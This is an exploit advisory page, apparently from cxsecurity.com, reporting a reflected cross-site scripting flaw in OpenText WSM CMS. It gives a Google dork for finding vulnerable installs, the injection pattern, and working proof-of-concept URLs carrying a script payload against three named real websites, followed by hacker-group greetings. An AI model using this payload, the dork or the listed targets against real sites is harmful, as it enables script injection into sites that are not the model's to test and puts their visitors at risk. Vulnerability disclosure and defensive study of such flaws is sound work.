OpenText WSM CMS Cross Site Scripting

2012.08.31
Credit: Crim3R
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!-- ________ .__ __________________ \_ ___ \_______|__| _____ \_____ \______ \ / \ \/\_ __ \ |/ \ _(__ <| _/ \ \____| | \/ | Y Y \/ \ | \ \______ /|__| |__|__|_| /______ /____|_ / \/ \/ \/ \/ --> # Exploit Title: OpenText WSM cms Cross Site Scripting Vulnerability # # Google Dork: Intext:" Powered by OpenText WSM" # # Date: 08/29/2012 # # Author: Crim3R # # Site : Http://Ajaxtm.com/ # # Vendor Home : http://www.opentext.com/uk # # Tested on: all # ================================== [+] the search form in site is not Vulnerable to xss but in main site its using Get method so xss is posilbe like below [+] target/home.php/[">htmlcode] D3m0: http://www.sailing.org/isaf/home.php/"><script>alert(0);</script> http://www.walesrallygb.com/home.php/"><script>alert(0);</script> http://www.millenniumstadium.com/home.php/"><script>alert(0);</script> ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369

References:

http://www.opentext.com/uk


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top